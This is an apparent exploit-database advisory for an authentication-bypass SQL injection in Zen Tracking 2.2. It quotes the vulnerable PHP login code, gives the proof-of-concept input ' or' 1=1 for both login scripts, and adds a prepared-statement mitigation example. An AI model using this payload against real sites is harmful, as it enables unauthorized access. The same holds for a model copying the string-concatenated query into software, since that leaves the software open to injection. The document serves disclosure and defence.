Vendor: Zen Tracking
By: cr4wl3r
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: Zen Tracking
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Related CWE: N/A
CPE: a:ringsworld:zentimetracking
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Zen Tracking <= 2.2 (Auth Bypass) SQL Injection Vulnerability

Zen Tracking version 2.2 and below is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying specially crafted input to the username and password fields of the userlogin.php and managerlogin.php scripts. By supplying the username and password values of ' or' 1=1, an attacker can bypass authentication and gain access to the application.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
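
One way to apply this mitigation, shown as an added example (not code from Zen Tracking or from the advisory): the login lookup rewritten with a PDO prepared statement, so the submitted values are bound as data instead of being concatenated into the query. The table names, the `password_hash` column, the `authenticate()` helper and the SQLite demo data are assumptions; verifying a stored hash with `password_verify()` goes beyond the sanitization advice above.

```php
<?php
declare(strict_types=1);

// Table names cannot be bound as parameters, so they come from a fixed allowlist.
// These names are assumptions standing in for $tbluser / $tblmanager.
const LOGIN_TABLES = ['user' => 'users', 'manager' => 'managers'];

function authenticate(PDO $db, string $role, string $username, string $password): ?array
{
    if (!isset(LOGIN_TABLES[$role]) || $username === '' || $password === '') {
        return null;
    }
    $table = LOGIN_TABLES[$role];

    // The username is bound as data; quotes in it never reach the SQL parser.
    $stmt = $db->prepare("SELECT id, username, password_hash FROM {$table} WHERE username = :u");
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // The password is checked in PHP against a stored hash, not inside the query.
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    return ['id' => (int) $row['id'], 'username' => $row['username']];
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
foreach (LOGIN_TABLES as $table) {
    $db->exec("CREATE TABLE {$table} (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)");
}
$ins = $db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
$ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

$attempts = [
    ['user', 'alice', 'correct horse'],     // valid login
    ['user', "' or' 1=1", "' or' 1=1"],     // the advisory's input, now plain data
    ['manager', 'alice', 'correct horse'],  // no such manager account
    ['admin', 'alice', 'correct horse'],    // role not in the allowlist
];
foreach ($attempts as [$role, $u, $p]) {
    $ok = authenticate($db, $role, $u, $p) !== null;
    printf("%-8s %-12s %s\n", $role, $u, $ok ? 'accepted' : 'rejected');
}
```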
Source

Exploit-DB raw data:

[+] Zen Tracking <= 2.2 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/calendars/zentimetracking/

[+] Vuln Code : 

[userlogin.php]

if (!empty($_POST['password']))
{
   $username =$_POST['username'];
   $password =$_POST['password'];
   dbConnect();
   $result1 = mysql_query("select * from ".$tbluser." where username='". $username ."' and password='". $password ."'".  mysql_error());

[+] PoC :

[ZenTracking_path]/userlogin.php

username: ' or' 1=1
Password: ' or' 1=1


[+] Vuln Code : 

[managerlogin.php]

if (!empty($_POST['password']))
{
   $username =$_POST['username'];
   $password =$_POST['password'];
   dbConnect();
   $result1 = mysql_query("select * from ".$tblmanager." where username='". $username ."' and password='". $password ."'".  mysql_error());

[+] PoC :

[ZenTracking_path]/managerlogin.php

username: ' or' 1=1
Password: ' or' 1=1